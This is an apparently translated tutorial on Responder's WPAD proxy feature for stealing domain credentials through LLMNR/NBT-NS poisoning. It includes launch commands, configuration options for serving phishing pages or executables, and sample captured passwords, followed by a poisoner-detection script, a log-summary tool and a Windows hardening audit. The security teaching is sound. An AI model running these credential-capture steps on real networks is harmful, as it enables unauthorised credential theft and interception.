Introduction

Responder is a powerful tool widely used in network penetration testing and security assessments. Its main purpose is to steal credentials on the network (NTLM hashes in particular) by poisoning LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and MDNS (Multicast DNS).

Responder is multifunctional: it can also start rogue authentication servers for HTTP, SMB, MSSQL, FTP, LDAP and other protocols. When a client is tricked into connecting to one of these rogue servers, its credentials can be captured.

Among Responder's many features, this article focuses on the BrowserListener module. BrowserListener targets web-browser traffic: it abuses WPAD (Web Proxy Auto-Discovery Protocol) to hijack the client's proxy settings and capture credentials sent through the browser. It can be especially effective where a proxy is already in use, such as in corporate networks.

Let's work through how Responder's BrowserListener operates, how it is used, and how to defend against it.
Overview of Responder and BrowserListener

Responder is an open-source tool developed by Laurent Gaffie, best known for exploiting weaknesses in the name-resolution protocols of Windows networks. Specifically, it sends forged answers (poisoning) to LLMNR and NBT-NS, the protocols Windows falls back to when the DNS server does not answer or is not configured. Clients then connect to the attacker's machine instead of the server they intended to reach, and their credentials are captured.

Responder provides a range of rogue server functions, including:

- HTTP/HTTPS server
- SMB server
- MSSQL server
- FTP server
- LDAP server
- DNS server
- WPAD proxy server
- Others (POP3, IMAP, SMTP, etc.)
The BrowserListener module is closely tied to some of these functions, above all the WPAD proxy server. Its stated main purpose is to discover the domain controller (PDC, Primary Domain Controller) on the network in stealth mode, but in practice it is considered to carry the behaviour related to WPAD abuse.

WPAD is the protocol by which clients (especially web browsers such as Internet Explorer) automatically discover the proxy settings for the network. The client normally asks, via DHCP or DNS, for the location of a configuration file named `wpad.dat` (a PAC, Proxy Auto-Config, file). An attacker uses Responder to answer that query and serve a forged `wpad.dat`. The forged file instructs the browser to route its traffic through the attacker's machine (the one running Responder).

Once the browser tries to communicate through the attacker's proxy, Responder can demand proxy authentication. If the user enters domain credentials without noticing (or because they were tricked into it), Responder captures them. This is the basic flow of a WPAD-based man-in-the-middle (MITM) attack.
How BrowserListener (the WPAD proxy function) works

The process by which Responder acts as a WPAD proxy and obtains credentials can be broken into several steps.

- Waiting for WPAD requests: when the browser on a client machine (particularly Windows) is configured to detect proxy settings automatically, it queries for the location of the WPAD configuration file, for example when it joins a network. This is normally done by trying to resolve a name such as `wpad.domain.com` in DNS, or via DHCP option 252.
- Poisoning name resolution: in many organisations no DNS record `wpad.domain.com` exists. When DNS resolution fails, Windows broadcasts/multicasts LLMNR and NBT-NS queries on the local network looking for a host named `WPAD`. Responder listens for these queries and answers "I am the WPAD server" before any legitimate server can (it wins the race).
- Serving the forged PAC file: the client requests `wpad.dat` from the WPAD server Responder pointed it to (that is, Responder itself). Responder sends a PAC file that is either built in or customised in the configuration file (`Responder.conf`).
- Applying the proxy settings: the client's browser executes the received PAC file and configures its proxy as instructed. The PAC file is written so that most web traffic, apart from specific URLs such as localhost, is sent to a specific port (3141 or 3128 by default) on the attacker's machine running Responder.
- Demanding proxy authentication and capturing credentials: when the browser tries to reach the Internet through the Responder proxy, Responder replies with a demand for proxy authentication (normally Basic or NTLM). Many browsers (Internet Explorer and Edge in particular) show the user an authentication dialog. When the user enters a domain username and password, those credentials (plaintext for Basic, a hash for NTLM) are sent to Responder and captured and logged.

With the `-F` option Responder can force NTLM authentication on the retrieval of the `wpad.dat` file itself. That can yield credentials before the user even opens a website in the browser (this option is disabled by default).
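The name-resolution step above (an LLMNR query for a name DNS cannot resolve, answered by whoever is fastest) is also the easiest place to detect a poisoner. The canary probe below is an added example written for this article, not code from the Responder project: it sends an LLMNR query for a random name that cannot exist on the network and treats any answer as evidence of a poisoner, because a healthy segment returns nothing. The group address, port and header layout come from RFC 4795; `build_sample_response()` is a constructed packet so the parser can be exercised offline, and `probe()` needs a multicast-capable interface.

```python
"""LLMNR canary: query a name that cannot exist and flag whoever answers.
Added example for this article, not code from the Responder project."""
import random
import socket
import string
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """DNS wire format: length-prefixed labels, zero terminator."""
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR reuses the DNS header: QDCOUNT=1, one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def skip_name(data: bytes, pos: int) -> int:
    """Advance past a wire-format name (handles compression pointers)."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:
            return pos + 2
        pos += 1 + length


def parse_llmnr_response(data: bytes, txid: int) -> list:
    """Return the IPv4 addresses in the answer section of a response that
    matches our transaction id; anything else yields an empty list."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:   # QR bit must be set
        return []
    pos = 12
    for _ in range(qd):                      # skip the echoed question
        pos = skip_name(data, pos) + 4
    answers = []
    for _ in range(an):
        pos = skip_name(data, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:        # A record
            answers.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return answers


def build_sample_response(name: str, txid: int, ip: str) -> bytes:
    """Constructed sample of the kind of answer a poisoner sends back."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(ip)
    return header + question + answer


def random_canary_name(length: int = 12) -> str:
    return "".join(random.choices(string.ascii_lowercase, k=length))


def probe(timeout: float = 2.0):
    """Send one canary query; return (name, [(source, answered_ip), ...]).
    Any entry in the list is a host claiming to be a name that does not exist."""
    name = random_canary_name()
    txid = random.randrange(1, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _port) = sock.recvfrom(1024)
            for ip in parse_llmnr_response(data, txid):
                hits.append((src, ip))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, hits


if __name__ == "__main__":
    canary, responders = probe()
    print(f"queried '{canary}':", "no answers (clean)" if not responders else responders)
```

Run it periodically from a host on each segment; because the name is random, a legitimate resolver can never answer, so a non-empty result is a high-confidence alert rather than a heuristic.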
Using Responder's BrowserListener

This section describes the basic procedure for running a WPAD proxy attack with Responder and capturing credentials through the browser. Penetration-testing distributions such as Kali Linux normally ship with Responder preinstalled. If it is not installed, clone it from GitHub and set it up:

```
# Cloning Responder from GitHub
git clone https://github.com/SpiderLabs/Responder.git
cd Responder
```
Basic startup

The most basic start command is:

```
sudo python Responder.py -I eth0 -w -b -v
```

The options mean the following:

- `sudo`: Responder listens on a network interface and binds privileged ports, so it needs administrator (root) rights.
- `python Responder.py`: runs the Responder script. Depending on the environment it may also be available simply as the `responder` command.
- `-I eth0`: the network interface to listen on. Replace `eth0` with the correct interface name for your environment (for example `ens33` or `wlan0`).
- `-w`: starts the rogue WPAD proxy server. This is the core of the BrowserListener function.
- `-b`: requests HTTP Basic authentication, which may capture the username and password in plaintext. (If you want NTLM authentication instead, omit this option or set it in `Responder.conf`.)
- `-v`: verbose mode, printing more information.

With this command Responder waits on the given interface for LLMNR/NBT-NS queries and WPAD requests. When a client tries to resolve WPAD and Responder's answer wins, the client's browser starts using Responder as its proxy. The next time the user opens a website an authentication prompt appears, and whatever credentials are entered are shown on Responder's console and written to its log files.
Configuring Responder.conf

Responder's behaviour can be customised in detail in the `Responder.conf` file. The main settings relevant to the WPAD proxy are:

Setting | Description | Default (example)
---|---|---
WPADProxyServer | Whether the WPAD proxy server is enabled. Can be overridden with the `-w` option. | On / Off
WPADResponsePort | The port the WPAD proxy server listens on. | 3128
WPADAuth | The authentication type demanded by the WPAD proxy (NTLM, Basic). Basic can be forced with the `-b` option. | NTLM
WPADConfigScript | Template of the PAC script served to clients. This is where the address and port of the server acting as proxy are set. | (script contents)
Serve-Html | Whether to serve a custom HTML page instead of an authentication request. | Off
HtmlFilename | The HTML file served when Serve-Html = On. | payload.html
Serve-Exe | Whether to serve an executable instead of an authentication request or HTML (can be used to distribute a malicious file). | Off
ExeFilename | The executable served when Serve-Exe = On. | payload.exe

Edit this file, for example, when you want to use a custom PAC file or to show a specific HTML page instead of the authentication prompt (for phishing purposes and the like).
Other options

- `-F`: forces NTLM authentication on the request for the WPAD (`wpad.dat`) file. This may obtain credentials (hashes) before the browser performs any real web access. Disabled by default.
- `-r`: also answers NBT-NS queries for the Workstation Service (WKSSVC). By default only File Server Service (FSRV) queries are answered.
- `--lm`: forces an LM hash downgrade (aimed at old systems such as Windows XP/2003). Not recommended, as it has little effect on hardened modern environments.
Example run and output

When Responder starts, it prints a log like the following on the console.

```
$ sudo responder -I eth0 -wbv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  |  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____|_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]    <-- WPAD proxy enabled
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [ON]    <-- Basic authentication enabled
    Force LM Downgrade         [OFF]
    Fingerprinting             [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.1.100]    <-- attacker's IP
    Challenge                  [Random]
    Don't Respond To Self      [ON]

[+] Listening for events...
[+] [verbose] WPADServer: Listening for WPAD connection on port 3128
...
[WPAD] [192.168.1.150] WPAD File request from: 192.168.1.150:51234 (User-Agent: ...)
[HTTP] Basic Client   : 192.168.1.150
[HTTP] Basic Username : DOMAIN\User1
[HTTP] Basic Password : Password123    <-- credentials captured!
```

In this example the client at IP address `192.168.1.150` requested the WPAD file and then sent the username `DOMAIN\User1` and password `Password123` via Basic authentication.

Captured credentials are not only printed on the console; they are also saved to log files under the `logs/` directory (for example `Responder-Session.log` and `HTTP-NTLMv2-192.168.1.150.txt`) and to a SQLite database. When NTLM hashes are obtained, tools such as Hashcat or John the Ripper can be used to attempt offline password cracking.
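The console and session logs above are also the record of which accounts were exposed during an engagement, and that is what the incident responder needs in order to force password resets. The summariser below is an added example for this article, not part of Responder: it parses lines in the format shown above and groups captures by protocol, authentication type, client and user, distinguishing plaintext (Basic) captures from hash-only (NTLM) ones without copying any secret into the report. The sample lines, addresses and hash value are constructed.

```python
"""Summarise Responder console/session log lines into an exposure report.
Added example for this article, not code from the Responder project."""
import re
from collections import defaultdict

# Constructed sample in the format Responder prints (hash value is made up).
SAMPLE_LOG = """\
[+] Listening for events...
[WPAD] [192.168.1.150] WPAD File request from: 192.168.1.150:51234 (User-Agent: Mozilla/5.0)
[HTTP] Basic Client   : 192.168.1.150
[HTTP] Basic Username : DOMAIN\\User1
[HTTP] Basic Password : Password123
[WPAD] [192.168.1.151] WPAD File request from: 192.168.1.151:49811 (User-Agent: Mozilla/5.0)
[HTTP] NTLMv2 Client   : 192.168.1.151
[HTTP] NTLMv2 Username : DOMAIN\\User2
[HTTP] NTLMv2 Hash     : User2::DOMAIN:1122334455667788:CONSTRUCTED_SAMPLE_HASH
[HTTP] Basic Client   : 192.168.1.150
[HTTP] Basic Username : DOMAIN\\User1
[HTTP] Basic Password : Password123
"""

CAPTURE = re.compile(
    r"^\[(?P<proto>[A-Z0-9-]+)\]\s+(?P<auth>\w+)\s+"
    r"(?P<field>Client|Username|Password|Hash)\s*:\s*(?P<value>.+)$"
)
WPAD_REQ = re.compile(r"^\[WPAD\]\s+\[(?P<ip>[\d.]+)\]\s+WPAD File request")


def summarize(lines):
    """Group captures by (proto, auth, client, username, plaintext?) with a
    count of occurrences. Passwords and hashes are consumed, never stored."""
    wpad_clients = set()
    exposures = defaultdict(int)
    pending = {}                       # (proto, auth) -> partial capture
    for raw in lines:
        line = raw.rstrip("\n")
        m = WPAD_REQ.match(line)
        if m:
            wpad_clients.add(m.group("ip"))
            continue
        m = CAPTURE.match(line)
        if not m:
            continue
        key = (m.group("proto"), m.group("auth"))
        field, value = m.group("field"), m.group("value").strip()
        if field == "Client":
            pending[key] = {"client": value}
        elif field == "Username":
            pending.setdefault(key, {})["username"] = value
        else:                          # Password or Hash completes the record
            entry = pending.pop(key, {})
            plaintext = field == "Password"
            exposures[(key[0], key[1], entry.get("client", "?"),
                       entry.get("username", "?"), plaintext)] += 1
    return {"wpad_clients": sorted(wpad_clients), "exposures": dict(exposures)}


def accounts_to_reset(report):
    """Return (plaintext_exposed, hash_only_exposed) username lists; an account
    seen in plaintext is listed there only, since it is the more urgent case."""
    plaintext = {e[3] for e in report["exposures"] if e[4]}
    hashed = {e[3] for e in report["exposures"] if not e[4]}
    return sorted(plaintext), sorted(hashed - plaintext)


if __name__ == "__main__":
    rep = summarize(SAMPLE_LOG.splitlines())
    print("clients that fetched wpad.dat:", rep["wpad_clients"])
    for (proto, auth, client, user, plain), n in rep["exposures"].items():
        print(f"{proto}/{auth} {client} {user} x{n} ({'PLAINTEXT' if plain else 'hash'})")
    print("reset first / reset next:", accounts_to_reset(rep))
```

Feed it `Responder-Session.log` (or the console capture) from the engagement; the `wpad_clients` list also tells you which hosts still had proxy auto-detection enabled, which feeds directly into the GPO clean-up described in the countermeasures section.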
Abuse and impact of the attack

When a WPAD proxy attack with Responder succeeds, the following consequences are possible.

- Credential theft: the most direct impact is that the user's domain credentials (password or NTLM hash) leak to the attacker, who may then impersonate that user to reach other systems and resources. If the credentials belong to an account with administrative rights, the damage can be severe.
- Man-in-the-middle (MITM): because the attacker acts as the proxy, unencrypted HTTP traffic can be read and tampered with. HTTPS traffic can also be decrypted if the client ignores the certificate error (Responder uses a self-signed certificate).
- Phishing and malware distribution: by changing `Responder.conf`, a fake login page (phishing site) can be shown instead of the normal authentication prompt, or a malicious executable (malware) can be served for download.
- Internal network reconnaissance: the user's browsing history and destinations can reveal information about servers and applications on the internal network.
Countermeasures and mitigations

The following measures protect a network against the WPAD attack performed by Responder and the related LLMNR/NBT-NS poisoning attacks.

- Disable WPAD:
  - If the organisation does not use proxy auto-discovery (WPAD), use Group Policy (GPO) to turn off the "Automatically detect settings" option on client PCs.
  - Disabling the Windows service `WinHttpAutoProxySvc` (WinHTTP Web Proxy Auto-Discovery Service) is also effective.
- Disable LLMNR and NBT-NS:
  - In a modern domain DNS is the primary name-resolution mechanism, and LLMNR and NBT-NS are usually unnecessary. Where possible, disable these legacy protocols via Group Policy.
- Register a WPAD record in DNS (if WPAD is used):
  - If WPAD is used legitimately, register a host record named `wpad` in DNS that points to the genuine PAC file, so that clients never fall back to LLMNR/NBT-NS.
  - On Windows Server 2008 and later, `wpad` may have to be removed from the DNS global query block list for that record to be served.
- Network segmentation and firewalls: segment the network appropriately and make sure unnecessary broadcast/multicast traffic does not cross segment boundaries.
- Intrusion detection/prevention (IDS/IPS): deploy IDS/IPS that can detect and block the activity of tools like Responder (LLMNR/NBT-NS poisoning attempts and so on).
- Strong password policy and multi-factor authentication (MFA): enforce long, complex passwords so that a leaked NTLM hash is hard to crack, and require MFA for access to important systems.
- Enable SMB signing: turn on SMB signing to prevent relay attacks against SMB traffic. (This counters NTLM relay rather than the hash capture itself, but it limits what a captured hash can be used for.)
- Endpoint security: current endpoint security products may detect and block the behaviour of tools like Responder and the malware they can distribute.
- User education: teach users not to enter credentials casually when an unexpected authentication prompt appears, and to be particularly wary of prompts in situations where none would normally be shown.
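The first three mitigations are concrete Windows client settings, so they can be audited rather than assumed. The script below is an added example for this article, not code from Responder or Microsoft. `evaluate()` is pure logic over a dictionary of collected values and runs anywhere (the `SAMPLE_UNHARDENED` dictionary is constructed); `collect()` reads the live registry with `winreg` and therefore only runs on Windows. The registry paths are the documented policy and service locations for LLMNR, the WinHTTP auto-proxy service and NetBIOS over TCP/IP; the byte-8 flag layout of the per-user `DefaultConnectionSettings` value is an assumption and is marked as such in the code.

```python
"""Audit the Windows client settings behind the WPAD / LLMNR / NetBIOS
mitigations. Added example for this article, not from Responder or Microsoft."""
import sys

# HKLM policy key: EnableMulticast = 0 disables LLMNR.
LLMNR_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\DNSClient"
# HKLM service key: Start = 4 means the service is disabled.
WPAD_SVC_KEY = r"SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc"
# HKLM: one subkey per interface, NetbiosOptions = 2 disables NetBIOS over TCP/IP.
NETBT_IFACES = r"SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"
# HKCU: binary DefaultConnectionSettings holds the browser proxy flags.
CONN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections"
# Assumption: bit 0x08 of byte 8 is "Automatically detect settings".
AUTODETECT_FLAG = 0x08


def evaluate(settings: dict) -> list:
    """Return human-readable findings; an empty list means all three
    mitigations (no WPAD auto-detect, no LLMNR, no NetBIOS) are in place."""
    findings = []
    if settings.get("EnableMulticast") != 0:
        findings.append("LLMNR not disabled by policy (EnableMulticast != 0)")
    if settings.get("WinHttpAutoProxySvc.Start") != 4:
        findings.append("WinHttpAutoProxySvc not disabled (Start != 4)")
    for iface, opt in settings.get("NetbiosOptions", {}).items():
        if opt != 2:
            findings.append(f"NetBIOS over TCP/IP enabled on {iface} (NetbiosOptions={opt})")
    blob = settings.get("DefaultConnectionSettings")
    if blob is None or len(blob) < 9 or blob[8] & AUTODETECT_FLAG:
        findings.append("Browser 'Automatically detect settings' (WPAD) on or unknown")
    return findings


def collect() -> dict:
    """Read the live values (Windows only); missing keys/values become None."""
    import winreg

    def read(hive, key, name):
        try:
            with winreg.OpenKey(hive, key) as k:
                return winreg.QueryValueEx(k, name)[0]
        except OSError:
            return None

    netbios = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, NETBT_IFACES) as root:
            i = 0
            while True:
                try:
                    sub = winreg.EnumKey(root, i)
                except OSError:
                    break
                netbios[sub] = read(winreg.HKEY_LOCAL_MACHINE,
                                    NETBT_IFACES + "\\" + sub, "NetbiosOptions")
                i += 1
    except OSError:
        pass
    return {
        "EnableMulticast": read(winreg.HKEY_LOCAL_MACHINE, LLMNR_KEY, "EnableMulticast"),
        "WinHttpAutoProxySvc.Start": read(winreg.HKEY_LOCAL_MACHINE, WPAD_SVC_KEY, "Start"),
        "NetbiosOptions": netbios,
        "DefaultConnectionSettings": read(winreg.HKEY_CURRENT_USER, CONN_KEY,
                                          "DefaultConnectionSettings"),
    }


# Constructed sample of a default, unhardened client (GUID is made up).
SAMPLE_UNHARDENED = {
    "EnableMulticast": None,                     # policy value absent
    "WinHttpAutoProxySvc.Start": 3,              # manual start
    "NetbiosOptions": {"Tcpip_{11111111-2222-3333-4444-555555555555}": 0},
    "DefaultConnectionSettings": bytes([0x46, 0, 0, 0, 1, 0, 0, 0, 0x09]) + bytes(3),
}

if __name__ == "__main__":
    data = collect() if sys.platform == "win32" else SAMPLE_UNHARDENED
    for line in evaluate(data) or ["No findings: WPAD, LLMNR and NetBIOS are disabled"]:
        print(line)
```

Run it under the user whose browser settings matter, since the auto-detect flag lives in HKCU; the machine-wide values come from HKLM and need no special rights to read.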
Summary

Responder's BrowserListener function (essentially its WPAD proxy) is a powerful technique for stealing user credentials through the web browser, especially on networks that are poorly configured. By combining LLMNR/NBT-NS poisoning with abuse of the WPAD protocol, an attacker can mount a man-in-the-middle attack and obtain sensitive information.

Countering this threat requires disabling unnecessary legacy protocols (LLMNR, NBT-NS) and features (WPAD), configuring the network properly, and applying layered security measures such as strong authentication, network monitoring and user education.

By understanding tools like Responder and reproducing their techniques in a test environment, security professionals can find the weak points in their own networks and build more robust defences. Such use must always stay within ethical bounds and comply with the law.
References

- Responder GitHub repository: https://github.com/SpiderLabs/Responder
- Trustwave blog post (Responder 2.0): https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/responder-2-0-owning-windows-networks-part-3/
- Qiita: LLMNR Poisoning with Responder: https://qiita.com/motoSuzuki/items/21f3ac87e1df09335850
- Microsoft Learn: Work with existing on-premises proxy servers (includes a WPAD explanation): https://learn.microsoft.com/ja-jp/entra/identity/app-proxy/application-proxy-configure-connectors-with-proxy-servers
- Japan Developer Support Internet Team Blog: About WPAD: https://jpdsi.github.io/blog/internet-explorer-microsoft-edge/wpad/